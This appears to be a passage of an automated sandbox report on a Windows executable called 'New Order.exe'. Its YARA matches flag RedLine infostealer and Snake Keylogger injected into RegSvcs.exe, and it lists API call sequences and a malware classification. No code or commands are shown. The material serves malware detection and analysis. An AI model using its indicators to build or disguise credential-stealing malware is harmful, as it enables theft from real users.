Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_00359576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00359576

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.New Order.exe.14e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3707765175.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: New Order.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: New Order.exe, 00000000.00000000.1246076111.0000000000382000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fb182659-4
Source: New Order.exe, 00000000.00000000.1246076111.0000000000382000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_dbbb59a2-5
Source: New Order.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e392b62e-0
Source: New Order.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cd312342-3

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: New Order.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0032D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0032D5EB

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_00321201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00321201

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0032E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0032E8F6

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002C8060	0_2_002C8060
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00332046	0_2_00332046
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00328298	0_2_00328298
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002FE4FF	0_2_002FE4FF
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002F676B	0_2_002F676B
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00354873	0_2_00354873
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002ECAA0	0_2_002ECAA0
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002CCAF0	0_2_002CCAF0
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002DCC39	0_2_002DCC39
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002F6DD9	0_2_002F6DD9
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002DD065	0_2_002DD065
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002C90BC	0_2_002C90BC
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002DB119	0_2_002DB119
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002C91C0	0_2_002C91C0
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E1394	0_2_002E1394
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E1706	0_2_002E1706
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E781B	0_2_002E781B
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002C7920	0_2_002C7920
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002D997D	0_2_002D997D
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E19B0	0_2_002E19B0
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E7A4A	0_2_002E7A4A
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E1C77	0_2_002E1C77
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E7CA7	0_2_002E7CA7
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00313CD5	0_2_00313CD5
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0034BE44	0_2_0034BE44
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002F9EEE	0_2_002F9EEE
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E1F32	0_2_002E1F32
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002CBF40	0_2_002CBF40
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_014C3620	0_2_014C3620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A91290	2_2_02A91290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A912C0	2_2_02A912C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A911D0	2_2_02A911D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_069543EB	2_2_069543EB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\user\Desktop\New Order.exe	Code function: String function: 002C9CB3 appears 31 times
Source: C:\Users\user\Desktop\New Order.exe	Code function: String function: 002DF9F2 appears 40 times
Source: C:\Users\user\Desktop\New Order.exe	Code function: String function: 002E0A30 appears 46 times

Source: New Order.exe, 00000000.00000003.1261156479.000000000403D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
Source: New Order.exe, 00000000.00000003.1257342218.0000000003E93000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
Source: New Order.exe, 00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs New Order.exe

Source: New Order.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.New Order.exe.14e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3707765175.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, j---m.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@5/4

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_003337B5 GetLastError,FormatMessageW,

0_2_003337B5

